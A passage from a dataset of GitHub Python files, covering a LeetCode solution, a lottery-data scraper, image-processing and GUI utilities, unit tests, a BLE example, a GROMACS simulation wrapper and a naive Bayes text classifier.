m\n","repo_name":"Elessar1996/dynamic_memory_network","sub_path":"EpisodeModule.py","file_name":"EpisodeModule.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5027310671","text":"from collections import defaultdict\nclass Solution:\n def groupAnagrams(self, strs):\n \n # groups = defaultdict(list)\n\n # for word in strs: # O(n)\n # key = sorted(word)\n \n # groups[key].append(word)\n\n # return [sorted(strs) for strs in groups.values()] # O(n*log(n))\n\n res = defaultdict(list) # mapping charCount to list of anagrams\n for word in strs:\n count = [0] * 26 # 26 letters in the alphabet\n # for every worl d, count the number of times each letter appears\n for c in word:\n count[ord(c) - ord('a')] += 1\n res[tuple(count)].append(word)\n return res.values() # O(n * m * 26)\n\n\nl = Solution()\nprint(l.groupAnagrams([\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]))","repo_name":"p1x31/ctci-python","sub_path":"leetcode/group_anagrams_49.py","file_name":"group_anagrams_49.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70528600227","text":"import requests\r\nimport pandas as pd\r\nimport collections\r\n\r\nurl = 'http://loterias.caixa.gov.br/wps/portal/loterias/landing/lotofacil/!ut/p/a1/04_Sj9CPykssy0xPLMnMz0vMAfGjzOLNDH0MPAzcDbz8vTxNDRy9_Y2NQ13CDA0sTIEKIoEKnN0dPUzMfQwMDEwsjAw8XZw8XMwtfQ0MPM2I02-AAzgaENIfrh-FqsQ9wBmoxN_FydLAGAgNTKEK8DkRrACPGwpyQyMMMj0VAcySpRM!/dl5/d5/L2dBISEvZ0FBIS9nQSEh/pw/Z7_HGK818G0K85260Q5OIRSC42046/res/id=historicoHTML/c=cacheLevelPage/=/'\r\n\r\nr = requests.get(url)\r\nr_text = r.text\r\ndf = pd.read_html(r_text)\r\n\r\n# type(df)\r\n# type(df[0])\r\n\r\ndf = df[0].copy()\r\nnr_pop = list(range(1, 26))\r\nnr_pares = list(range(2, 25, 2))\r\nnr_impares = list(range(1, 26, 2))\r\nnr_primos = [2, 3, 5, 7, 11, 13, 17, 19, 23]\r\n\r\ncomb = []\r\nv_numbers = {\r\n 'v_1': 0,\r\n 'v_2': 0,\r\n 'v_3': 0,\r\n 'v_4': 0,\r\n 'v_5': 0,\r\n 'v_6': 0,\r\n 'v_7': 0,\r\n 'v_8': 0,\r\n 'v_9': 0,\r\n 'v_10': 0,\r\n 'v_11': 0,\r\n 'v_12': 0,\r\n 'v_13': 0,\r\n 'v_14': 0,\r\n 'v_15': 0,\r\n 'v_16': 0,\r\n 'v_17': 0,\r\n 'v_18': 0,\r\n 'v_19': 0,\r\n 'v_20': 0,\r\n 'v_21': 0,\r\n 'v_22': 0,\r\n 'v_23': 0,\r\n 'v_24': 0,\r\n 'v_25': 0\r\n}\r\n\r\nlst_campos = ['Bola1', 'Bola2', 'Bola3', 'Bola4', 'Bola5', 'Bola6', 'Bola7', 'Bola8', 'Bola9', 'Bola10', 'Bola11', 'Bola12', 'Bola13', 'Bola14', 'Bola15']\r\n\r\nfor index, row in df.iterrows():\r\n V_PARES = 0\r\n V_IMPARES = 0\r\n V_PRIMOS = 0\r\n for campo in lst_campos:\r\n if row[campo] in nr_pares:\r\n V_PARES += 1\r\n if row[campo] in nr_impares:\r\n V_IMPARES += 1\r\n if row[campo] in nr_primos:\r\n V_PRIMOS += 1\r\n for n in nr_pop:\r\n if row[campo] == n:\r\n v_numbers[\"v_{}\".format(n)] += 1\r\n\r\n comb.append(str(V_PARES) + 'p-' + str(V_IMPARES) + 'i-' + str(V_PRIMOS) + 'np')\r\n\r\nless_fr = min(v_numbers, key=v_numbers.get)\r\nhigh_fr = max(v_numbers, key=v_numbers.get)\r\n\r\ncounter = collections.Counter(comb)\r\nresult = pd.DataFrame(counter.items(), columns=['combinação', 'frequencia'])\r\nresult['p_freq'] = result['frequencia']/result['frequencia'].sum()\r\nresult = result.sort_values(by='p_freq')","repo_name":"clarabatt/data_engineer_bootcamp","sub_path":"A001/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"75139247267","text":"import matplotlib.pyplot as plt\nimport os\n\ndef plot_img_and_mask(img, mask):\n classes = mask.shape[0] if len(mask.shape) > 2 else 1\n fig, ax = plt.subplots(1, classes + 1)\n ax[0].set_title('Input image')\n ax[0].imshow(img)\n if classes > 1:\n for i in range(classes):\n ax[i + 1].set_title(f'Output mask (class {i + 1})')\n ax[i + 1].imshow(mask[1, :, :])\n else:\n ax[1].set_title(f'Output mask')\n ax[1].imshow(mask)\n plt.xticks([]), plt.yticks([])\n plt.show()\n\ndef check_folder(folder1: str, folder2: str):\n dict_store = {folder1: os.listdir(folder1), folder2: os.listdir(folder2)}\n len_folder1 = len(dict_store[folder1])\n len_folder2 = len(dict_store[folder2])\n length = len_folder1 if len_folder1 <= len_folder2 else len_folder2\n idx = 0\n while idx < length:\n if dict_store[folder1][idx][0] != dict_store[folder2][idx][0]:\n if len_folder1 <= len_folder2:\n print(\"Not found in folder 1 and have found in folder2: \", dict_store[folder2][idx])\n else:\n print(\"Not found in folder 2 and have found in folderi: \", dict_store[folder1][idx])\n return False\n idx += 1\n return True","repo_name":"lehoangHUST/BK.AI-NAVER","sub_path":"Pytorch-UNet/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10818409850","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 19 13:23:00 2016\n\n@author: Jan-Philipp Kolb\n\"\"\"\n\n# Source: http://www.python-kurs.eu/tkinter_checkboxes.php\n\nfrom tkinter import *\nmaster = Tk()\n\ndef var_states():\n print(\"male: %d,\\nfemale: %d\" % (var1.get(), var2.get()))\n\nLabel(master, text=\"Your sex:\").grid(row=0, sticky=W)\nvar1 = IntVar()\nCheckbutton(master, text=\"male\", variable=var1).grid(row=1, sticky=W)\nvar2 = IntVar()\nCheckbutton(master, text=\"female\", variable=var2).grid(row=2, sticky=W)\nButton(master, text='Quit', command=master.quit).grid(row=3, sticky=W, pady=4)\nButton(master, text='Show', command=var_states).grid(row=4, sticky=W, pady=4)\nmainloop()\n\n# http://www.python-kurs.eu/tkinter_entry_widgets.php\n","repo_name":"Japhilko/DataAnalysis","sub_path":"python/pythonGUI/Checkbox.py","file_name":"Checkbox.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"75048702307","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport os\nimport argparse\n\nfrom filter import *\nfrom histogram import *\n\n# Add argument from command line or cmd in Linux or Windows 10.\ndef add_argument():\n # Init add argument from command line\n parser = argparse.ArgumentParser(\n description='Add Argument for task in image.')\n \n # Add argument.\n parser.add_argument('--input', default=None, type=str,\n help='Image input is path file and have type string.')\n parser.add_argument('--convert_RGB', default=True, type=int,\n help='We can choose image convert RGB or Gray. If RGB => True, else is False.')\n parser.add_argument('--save_info_image', default=True, type=bool,\n help='Save all information in image. Example: dynamic range, histogram, height and width of image_input')\n parser.add_argument('--case', default=None, type=int,\n help='Choose case to implement task.')\n \n args = parser.parse_args()\n return args\n\n# FORMATS OF IMAGE AND VIDEO\nIMG_FORMATS = ['jpg', 'jpeg', 'png'] # acceptable image suffixes\nVID_FORMATS = ['avi', 'mp4', 'gif'] # acceptable video suffixes\n\n# TASK CASE IN ASSIGNMENT.\nCASE = ['output',\n 'draw_hist',\n 'scale_histogram',\n 'histogram_equalizion',\n 'Median filter',\n 'Mean filter',\n 'Gauss filter',\n 'Sharp filter'] \n\n# '' mean nothing task.\n\n# Built class Image\nclass Image:\n \"\"\"\n We built class Image include func:\n 1. Calculate cumdf histogram of image. Example: Image gray, Image RGB or BGR....\n 2. Calculate dynamic range of image. Example: Image have to intensity from min: 0 -> max: 156.\n 3. Write information all about image in json.\n \"\"\"\n\n def __init__(self, path_file: str, RGB: int):\n # Func init paras input\n \"\"\"\n + Paras: \n 1. Para1: path_img is path of image in system. Maybe path_img is folder or file, self.path_file .\n 2. Para2: RGB is convert image from RGB or convert Gray, self.RGB . \n \"\"\"\n self.path_file = path_file\n self.RGB = RGB\n self.name_img = path_file.split('/')[-1].split('.')[0]\n\n # Check paras is true type ??\n assert os.path.isfile(self.path_file), f\"Not file image {self.path_file} in system.\"\n assert isinstance(self.RGB, int), f\"Para self.RGB only support {type(self.RGB)}.\"\n\n self.img_np = cv2.imread(self.path_file, self.RGB)\n if self.RGB == 0:\n self.img_np = self.img_np.reshape((self.img_np.shape[0], self.img_np.shape[1], 1))\n\n\n def dynamic_range(self):\n # calculate the dynamic range of values in that picture\n if self.img_np.shape[2] == 3:\n dynamic = {'Red': [np.min(self.img_np[:, : , 0]), np.max(self.img_np[:, :, 0])] ,\n 'Green': [np.min(self.img_np[:, :, 1]), np.max(self.img_np[:, :, 1])],\n 'Blue': [np.min(self.img_np[:, :, 2]), np.max(self.img_np[:, :, 2])]\n }\n else:\n dynamic = {'Gray': [np.min(self.img_np[:, :]), np.max(self.img_np[:, :])]}\n # Each channels Red, Blue or Green have dynamic range ?\n # Specific convert image have range intensity [L1, L2] to [L1', L2'].\n \n return dynamic\n \n # 4. Save file json (Contains about infor image.)\n def save_folder(self):\n print('*'*30)\n print(\"Start .... Loading\")\n # Information\n infor_img = {\n 'path': [],\n 'dynamic range': [],\n 'dimensional': []\n }\n infor_img['path'].append(self.path_file)\n infor_img['dynamic range'].append(self.dynamic_range())\n infor_img['dimensional'].append([self.img_np.shape[0], self.img_np.shape[1]])\n\n print(infor_img)\n # Write infor in file .json\n # with open(self.name_img + '_output' + '.json', 'w') as f:\n # json.dump(infor_img, f)\n print(\"Finish\")\n print('*'*30)\n\n\n# Run main\ndef run():\n\n # Read image if args.input have suffixes is '.jpg', '.jpeg', '.png'\n # Read video if args.input have suffixes is '.mp4', '.avi', '.gif'\n\n if args.input.split('/')[-1].split('.')[1] in IMG_FORMATS:\n img = Image(args.input, args.convert_RGB)\n else:\n raise ValueError(f\"Parameters not support for {VID_FORMATS}\")\n\n # Important\n \"\"\"\n case 0: Input: Image -> Output: cv2.imread() -> Type np.ndarray.\n case 1: Input: Image, bin -> Output: List histogram of image. \n case 2: Input: Image, src_range, dst_range -> Output: Image use scale histogram (Linear Transform)\n case 3: Input: Image -> Output: Image with Histogram Equalizion\n case 4: Input: Image -> Output: Image after use median filter.\n case 5: Input: Image -> Output: Image after use smoothing filter (Mean Filter)\n case 6: Input: Image -> Output: Image after use smoothing filter (Gauss Filter)\n case 7: Input: Image -> Output: Image after use sharpening filter (Laplacian filter)\n \"\"\"\n case = args.case\n # All case from 0 -> 6.\n if case == 0:\n # Write image and show image in display.\n cv2.imwrite(img.name_img + '_output' + '.png', img.img_np)\n elif case == 1:\n # Count histogram.\n hist = count_histogram(img.img_np)\n intensity_img = [x for x in range(256)]\n # Save plot of histogram in intensity.\n for channel in range(img.img_np.shape[2]):\n plt.plot(intensity_img, hist['Channel '+ str(channel + 1)])\n plt.xlabel('Intensity of image')\n plt.ylabel('Histogram of intensity')\n plt.savefig('Channel '+ str(channel + 1) + '.png')\n plt.title('Channel '+ str(channel + 1))\n plt.clf()\n elif case == 2:\n # Use for one channel is: Gray.\n src = img.dynamic_range()['Gray']\n new_img = scale_histogram(img.img_np, src, dst_range = [0, 200])\n cv2.imwrite(img.name_img + '_scale_histogram' + '.png', new_img)\n elif case == 3:\n new_img = histogram_equalizion(img.img_np)\n cv2.imwrite(img.name_img + '_histogram_equal' + '.png', new_img)\n elif case == 4:\n # Use median filter to reduce noise\n new_img = median_filter(img.img_np, filter_size=(5, 5))\n cv2.imwrite(img.name_img + '_median' + '.png', new_img)\n elif case == 5:\n new_img = mean_filter(img.img_np, filter_size=(5, 5))\n cv2.imwrite(img.name_img + '_mean' + '.png', new_img)\n elif case == 6:\n new_img = gauss_filter(img.img_np, filter_size=(5, 5), sigma=1)\n cv2.imwrite(img.name_img + '_gauss' + '.png', new_img)\n elif case == 7:\n new_img = laplacian_filter(img.img_np)\n cv2.imwrite(img.name_img + '_sharp' + '.png', new_img)\n else:\n raise ValueError(\"Not found case : {case} in program.\")\n\n# Run main\nif __name__ == '__main__':\n global args\n args = add_argument()\n run()","repo_name":"lehoangHUST/Digital-Image-Processing","sub_path":"Digital_Image_Processing/DIP.Assignment1_3/run_img.py","file_name":"run_img.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28701400727","text":"dictionary = {}\n\ndictionary['superman'] = 'he is very strong'\ndictionary['flash'] = 'he is the fastest man in the world'\n\ndictionary.pop('superman')\n\ndictionary = {'superman' : {'power1':'he is very strong', 'power2':'he can fly'},'flash' : 'he is the fastest man in the world', 'green lantern': 'he is the choosen one'}\n\nfor key in dictionary:\n print(key)\n print(dictionary[key])","repo_name":"deimos31/pythonAlfa","sub_path":"day10/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"8196004092","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport pytest\n\nfrom biorxiv_cli.cli import cli\n\n\n@pytest.mark.vcr()\ndef test_read_accepts_one_subject(runner):\n result = runner.invoke(cli, ['read', 'biochemistry'])\n\n assert 0 == result.exit_code\n assert 'Influence of SNF1' in result.output\n\n\n@pytest.mark.vcr()\ndef test_read_accepts_multiple_subjects(runner):\n result = runner.invoke(cli, ['read', 'genomics', 'bioinformatics'])\n\n assert 0 == result.exit_code\n assert 'SISS-Geo' in result.output\n\n\n@pytest.mark.vcr()\ndef test_read_falls_back_to_all_without_subjects(runner):\n result = runner.invoke(cli, ['read'])\n\n assert 0 == result.exit_code\n assert 'Neurodynamic explanation' in result.output\n","repo_name":"jacquerie/biorxiv-cli","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"70"}
+{"seq_id":"41142580786","text":"from PyQt5 import QtWidgets, QtCore , QtGui \nimport os\nfrom gui import Ui_MainWindow\nimport backend\nimport time\nclass Window(QtWidgets.QMainWindow,Ui_MainWindow):\n context = None\n\n\n def __init__(self):\n\n Window.context = self\n super().__init__()\n self.setupUi(self)\n self.show()\n self.message_credit()\n\n\n #Button Pressed Event\n self.download.pressed.connect(self.download_check)\n self.url_check.pressed.connect(self.checking_url)\n self.pushButton.pressed.connect(self.browser_location)\n \n global title_video\n\n def download_check(self):\n try:\n self.start_download()\n except:\n self.errrormessage_pass()\n\n def errrormessage_pass(self):\n \n emsg = QtWidgets.QMessageBox(self)\n emsg.setWindowModality(QtCore.Qt.WindowModal)\n self.Current_Status_Update(\"Waiting for Correct Values.\")\n msg=\"Not able to Download. \\n\\nFill all the Boxes Correctly. Be sure to check the Link and Select the Quality.\"\n emsg.setText(msg)\n emsg.setIcon(emsg.Critical)\n emsg.setWindowTitle(\"Incorrect Values\")\n emsg.exec_()\n return\n\n def browser_location(self):\n global path_save\n path_save = QtWidgets.QFileDialog.getExistingDirectory()\n path_save = path_save + \"/\"\n self.lineEdit_2.setText(path_save)\n\n def Current_Status_Update(self,text_update):\n self.label_4.setFont(QtGui.QFont(\"Miriam\", 11))\n self.label_4.setText(\"Current Status: \"+ text_update)\n \n def message_pass(self,msg):\n \n emsg = QtWidgets.QMessageBox(self)\n emsg.setWindowModality(QtCore.Qt.WindowModal)\n\n\n emsg.setText(msg)\n emsg.setIcon(emsg.Information)\n emsg.setWindowTitle(\"Sucessful\")\n emsg.exec_()\n self.clear_program()\n\n def message_credit(self):\n \n emsg = QtWidgets.QMessageBox(self)\n emsg.setWindowModality(QtCore.Qt.WindowModal)\n\n msg = \"Thanks for using this Application.For more Cool Stuffs & Source Code, Check my other Repositories on GitHub!! [https://github.com/imabhisht]\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t-Abhisht\"\n emsg.setText(msg)\n emsg.setIcon(emsg.Information)\n emsg.setWindowTitle(\"Startup Message\")\n emsg.exec_()\n\n def checking_url(self):\n global url\n global check\n check = 0\n url = self.lineEdit.text()\n alpha = backend.check_url(url)\n if alpha == \"correct\":\n self.label_5.setText(\"\")\n self.label_6.setPixmap(QtGui.QPixmap(\"Resources/tick.png\"))\n list_rev = backend.get_resolutions()\n self.quality_enable_control(list_rev)\n metdata = backend.metadata()\n self.get_metdata(metdata)\n self.lineEdit_2.clear()\n check = 1\n \n else:\n self.label_5.setText(\"Check Internet Connection or Insert valid link\")\n self.label_6.setPixmap(QtGui.QPixmap(\"Resources/wrong.png\"))\n\n def quality_enable_control(self,list_rev):\n if \"1080p\" in list_rev:\n self.comboBox.model().item(1).setEnabled(True)\n if \"720p\" in list_rev:\n self.comboBox.model().item(2).setEnabled(True)\n if \"480p\" in list_rev:\n self.comboBox.model().item(3).setEnabled(True)\n if \"360p\" in list_rev:\n self.comboBox.model().item(4).setEnabled(True)\n if \"240p\" in list_rev:\n self.comboBox.model().item(5).setEnabled(True)\n if \"144p\" in list_rev:\n self.comboBox.model().item(6).setEnabled(True)\n \n\n def get_metdata(self,metdata):\n global title_video\n title_video = metdata[0]\n self.preview_image.setPixmap(QtGui.QPixmap(r\"Cache\\local_image.jpg\"))\n self.title_preview.setFont(QtGui.QFont(\"Miriam\", 11))\n self.title_preview.setText(\"Title: \" + metdata[0])\n self.publisher_preview.setFont(QtGui.QFont(\"Miriam\", 11))\n self.publisher_preview.setText(\"Author: \"+metdata[1])\n self.views_preview.setFont(QtGui.QFont(\"Miriam\", 11))\n self.views_preview.setText(\"Views : \"+str(metdata[2]))\n self.size_preview.setFont(QtGui.QFont(\"Miriam\", 11))\n self.size_preview.setText(\"Length : \"+str(metdata[3]))\n self.Current_Status_Update(\"Ready to Download\")\n\n def clear_program(self):\n self.Current_Status_Update(\"Waiting for Next Video\")\n self.label_6.setPixmap(QtGui.QPixmap(\"Resources/white.png\"))\n self.label_5.setText(\"Inset New Link\")\n self.comboBox.setCurrentIndex(0)\n self.label_4.setText(\"Current Status: \")\n self.lineEdit_2.clear()\n self.lineEdit.clear()\n self.preview_image.setPixmap(QtGui.QPixmap(\"Resources/white.png\"))\n self.title_preview.setText(\"Title: \")\n self.publisher_preview.setText(\"Author: \")\n self.views_preview.setText(\"Views: \")\n self.size_preview.setText(\"Length: \")\n self.progressBar.setValue(0)\n\n def start_download(self):\n\n cout = 0\n while cout < 15:\n self.progressBar.setValue(cout)\n cout+=1\n\n self.Current_Status_Update(\"Current Status: Downloading Video & Audio\") \n rev = self.comboBox.currentText()\n backend.download(rev)\n while cout < 60:\n self.progressBar.setValue(cout)\n cout+=1\n self.Current_Status_Update(\"Current Status: Merging into one File...\")\n print(\"Downloaded Source Files...Going for Converting\")\n backend.compiling_files(path_save)\n while cout < 99:\n self.progressBar.setValue(cout)\n cout+=1\n self.message_pass(\"The Video \" + title_video + \" has been Successfully Downloaded!!\\n\\n Thanks for using!!\")\n self.clear_program()\n \n ","repo_name":"imabhisht/Youtube-Downloader-GUI","sub_path":"Python Souce Files/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"12708818187","text":"import time\n\nfrom adafruit_ble import BLERadio\nfrom adafruit_ble.advertising.standard import ProvideServicesAdvertisement\nfrom adafruit_ble.services.nordic import UARTService\n\nble = BLERadio()\nwhile True:\n while ble.connected and any(\n UARTService in connection for connection in ble.connections\n ):\n for connection in ble.connections:\n if UARTService not in connection:\n continue\n print(\"echo\")\n uart = connection[UARTService]\n uart.write(b\"echo\")\n # Returns b'' if nothing was read.\n one_byte = uart.read(4)\n if one_byte:\n print(one_byte)\n print()\n time.sleep(1)\n\n print(\"disconnected, scanning\")\n for advertisement in ble.start_scan(ProvideServicesAdvertisement, timeout=1):\n if UARTService not in advertisement.services:\n continue\n ble.connect(advertisement)\n print(\"connected\")\n break\n ble.stop_scan()\n","repo_name":"adafruit/Adafruit_CircuitPython_BLE","sub_path":"examples/ble_uart_echo_client.py","file_name":"ble_uart_echo_client.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"70"}
+{"seq_id":"19147107223","text":"\"\"\"\nCOMP 1510 - Assignment 2\nAuthor: Nicholas Johnston\nStu#: A01242666\nDate: November 18, 2020\n\"\"\"\nfrom unittest import TestCase\n\nfrom utilities import format_book_row\n\n\nclass TestFormatBookRow(TestCase):\n def test_format_book_row_valid_book(self):\n book_values = ['Dupre', 'Skyscrapers', 'BD&L', '12', 'Architecture', '20th Century']\n expected = \"Dupre\\tSkyscrapers\\tBD&L\\t12\\tArchitecture\\t20th Century\"\n actual = format_book_row(book_values)\n self.assertEqual(expected, actual)\n\n def test_format_book_row_with_a_nan_value(self):\n book_values = ['Eddings', 'Belgarath the Sorcerer', '', '34', 'Fiction', 'Fantasy']\n expected = \"Eddings\\tBelgarath the Sorcerer\\t\\t34\\tFiction\\tFantasy\"\n actual = format_book_row(book_values)\n self.assertEqual(expected, actual)\n","repo_name":"nejohnston/library-manager","sub_path":"test_suite/test_format_book_row.py","file_name":"test_format_book_row.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"72217555107","text":"#!/usr/bin/env python\n\n# import pandas as pd\nimport sys\nfrom time import sleep\nimport subprocess\nimport re\nfrom .analysis import *\n\n# pip install pandas\n\n# Autorship information\n__author__ = \"Hüsamettin Deniz Özeren\"\n__copyright__ = \"Copyright 2021\"\n__credits__ = [\"Hüsamettin Deniz Özeren\"]\n__license__ = \"GNU General Public License v3.0\"\n__maintainer__ = \"Hüsamettin Deniz Özeren\"\n__email__ = \"denizozeren614@gmail.com\"\n\n\nclass multiSys:\n def __init__(self, mdpfilePath):\n self.mdpfilePath = mdpfilePath\n\n def mdp_unbias(self):\n with open(self.mdpfilePath, \"r+\") as mdpFile:\n content = mdpFile.read()\n content = re.sub('continuation\\t\\t= yes', 'continuation\\t\\t= no', content) # noqa\n content = re.sub('gen_vel\\t\\t= no', 'gen_vel\\t\\t= yes', content)\n content = re.sub('gen_seed.*\\n|gen_temp.*\\n', '', content, flags=re.M) # noqa\n content = re.sub(r\"(gen_vel.*$)\", r\"\\1\\ngen_temp\\t\\t= 310\", content, flags=re.MULTILINE) # noqa #add temperature variable here\n content = re.sub(r\"(gen_temp.*$)\", r\"\\1\\ngen_seed\\t\\t= -1\", content, flags=re.MULTILINE) # noqa\n mdpFile.seek(0)\n mdpFile.write(content)\n mdpFile.truncate()\n\n def mdp_bias(self):\n with open(self.mdpfilePath, \"r+\") as mdpFile:\n content = mdpFile.read()\n content = re.sub('continuation\\t\\t= no', 'continuation\\t\\t= yes', content) # noqa\n content = re.sub('gen_seed.*\\n|gen_temp.*\\n', '', content, flags=re.M) # noqa\n content = re.sub('gen_vel\\t\\t= yes', 'gen_vel\\t\\t= no', content)\n mdpFile.seek(0)\n mdpFile.write(content)\n mdpFile.truncate()\n\n def distance(self, istep, dt, rdist):\n distance = subprocess.run(['gmx_mpi',\n 'distance',\n '-f', istep + '.trr',\n '-s', istep + '.tpr',\n '-oav', 'distance.xvg',\n '-dt', str(dt),\n '-select', rdist])\n error = distance.returncode\n if error != 0:\n sys.exit()\n\n SlopeObject = slope_5p()\n y1, slope, slope_intercept = SlopeObject.distance_slope()\n SlopeObject.log_slope(y1, slope, slope_intercept)\n return y1, slope\n\n def create_folder(self, mdp, init_gro, topol, index, maxwarn):\n pass\n\n def prepare_init(self, mdp, istep, init_gro, topol, index, maxwarn):\n prepare_init = subprocess.run(['gmx_mpi',\n 'grompp',\n '-f', mdp + '.mdp',\n '-o', istep + '.tpr',\n '-c', init_gro + '.gro',\n '-r', init_gro + '.gro',\n '-p', topol + '.top',\n '-n', index + '.ndx',\n '-maxwarn', str(maxwarn)])\n error = prepare_init.returncode\n print(error)\n if error != 0:\n sys.exit()\n\n def prepare(self, mdp, istep, pstep, topol, index, maxwarn):\n prepare = subprocess.run(['gmx_mpi',\n 'grompp',\n '-f', mdp + '.mdp',\n '-o', istep + '.tpr',\n '-c', pstep + '.gro',\n '-t', pstep + '.cpt',\n '-p', topol + '.top',\n '-n', index + '.ndx',\n '-maxwarn', str(maxwarn)])\n error = prepare.returncode\n print(error)\n if error != 0:\n sys.exit()\n\n def run(self, ntmpi, ntomp, dds, dlb, istep, gpu):\n if gpu == 0:\n pinoffset = 0\n\n elif gpu == 1:\n pinoffset = 12\n run = subprocess.run(['mpirun',\n '-np', str(ntmpi),\n 'gmx_mpi',\n 'mdrun',\n '-v',\n '-ntomp', str(ntomp),\n '-gpu_id', str(gpu),\n '-pin on',\n '-pinoffset', str(pinoffset),\n '-pinstride 1',\n '-dds', str(dds),\n '-dlb', dlb,\n '-deffnm', istep])\n error = run.returncode\n print(error)\n if error != 0:\n sys.exit()\n\n def clean_backups(self):\n print('\\nCleaning the backups...\\n')\n sleep(3)\n subprocess.run(['rm -f \\#*\\#'], shell=True) # noqa\n\n def stuckfixer(self, line_number, ps_time, nr, fixer):\n # reading last last 5, 8, 10 lines to change simulation time if fixer = True in input.py\n distance = []\n if exists(\"log_slope.txt\") and fixer is True and nr > 10:\n with open(\"log_slope.txt\") as f:\n for line in (f.readlines()[-int(line_number):]):\n cols = line.split()\n distance.append(float(cols[0]))\n deviation_d = np.std(distance)\n if deviation_d < 0.03:\n with open(self.mdpfilePath, \"r+\") as mdpFile:\n content = mdpFile.read()\n content = re.sub('nsteps.*\\n', '', content, flags=re.M) # noqa\n content = re.sub(r\"(dt.*$)\", r\"\\1\\nnsteps = \"+str(ps_time), content, flags=re.MULTILINE) # noqa\n mdpFile.seek(0)\n mdpFile.write(content)\n mdpFile.truncate()\n else:\n with open(self.mdpfilePath, \"r+\") as mdpFile:\n content = mdpFile.read()\n content = re.sub('nsteps.*\\n', '', content, flags=re.M) # noqa\n content = re.sub(r\"(dt.*$)\", r\"\\1\\nnsteps = 300000\", content, flags=re.MULTILINE) # noqa\n mdpFile.seek(0)\n mdpFile.write(content)\n mdpFile.truncate()\n\n def stage(self, distance, rdist1, rdist2):\n if mean(distance) < 0.5:\n rdist = rdist2\n file_name = 'log_slope.txt'\n log_file = open(file_name, 'a+')\n log_file.write(\"----- Stage 2 has started... -----\")\n log_file.close()\n else:\n rdist = rdist1\n return rdist\n","repo_name":"hozeren/multigro","sub_path":"bin_py/multiSys.py","file_name":"multiSys.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"18820906906","text":"import os\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport numpy as np\nfrom nltk.stem import PorterStemmer\nimport sys\nps = PorterStemmer()\n\ndef openDirectory(dirName):\n os.chdir(dirName)\n\nclass Process:\n stop_words = set(stopwords.words('english'))\n directories = ['comp.graphics/','misc.forsale/','rec.autos/','rec.motorcycles/','sci.space/']\n commonDirectoryPath1=sys.argv[1]\n commonDirectoryPath2=sys.argv[2]\n # commonDirectoryPath1 = 'C:/Users/MAITRI SHAH/Desktop/Studies/Utd/Sem1/ML/Assignment4/20news-bydate/20news-bydate-train/'\n # commonDirectoryPath2='C:/Users/MAITRI SHAH/Desktop/Studies/Utd/Sem1/ML/Assignment4/20news-bydate/20news-bydate-test/'\n def readAllFiles(self):\n uniqueWordsList1 = []\n classLabels1=[]\n for i in self.directories:\n pathForOsWalk = ''.join([self.commonDirectoryPath1,i])\n # print(pathForOsWalk)\n os.chdir(pathForOsWalk)\n #print(pathForOsWalk, \"reading has been started..... \")\n j = 1;\n for dirpath, dirname, files in os.walk(pathForOsWalk):\n for file in files:\n uniqueWordsList1.append(self.readSingleFile(file))\n classLabels1.append(i)\n j = j + 1\n #print(pathForOsWalk, \"reading finished..... \",i,\"Total filles read\")\n #print(uniqueWordsList1)\n uniqueWordsList2 = []\n classLabels2 = []\n for i in self.directories:\n pathForOsWalk = ''.join([self.commonDirectoryPath2, i])\n #print(pathForOsWalk)\n os.chdir(pathForOsWalk)\n # print(pathForOsWalk, \"reading has been started..... \")\n j = 1;\n for dirpath, dirname, files in os.walk(pathForOsWalk):\n for file in files:\n uniqueWordsList2.append(self.readSingleFile(file))\n classLabels2.append(i)\n j = j + 1\n #print(pathForOsWalk, \"reading finished..... \", i, \"Total filles read\")\n return uniqueWordsList1,classLabels1,uniqueWordsList2,classLabels2\n\n def readSingleFile(self,file):\n f = open(file,'r')\n uniqueWords = []\n filteredSentence = []\n finished = False\n for line in f:\n if line.startswith('Lines:') or line.startswith('Subject:') or line.startswith('Organization:'):\n finished = True\n if (line.startswith('From:') or line.startswith('Article-I.D.:') or line.startswith('Expires:') or line.startswith('Reply-To:')):\n finished = False\n if finished:\n words = word_tokenize(line)\n tokens = (e for e in words if e.isalpha())\n for w in tokens:\n if w not in self.stop_words:\n w=ps.stem(w)\n filteredSentence.append(w)\n if w not in uniqueWords:\n uniqueWords.append(w)\n\n f.close()\n return uniqueWords\n\n def theNaiveBayes(self,uniqueList1,classes1,uniqueList2,classes2):\n trainInstances=uniqueList1\n 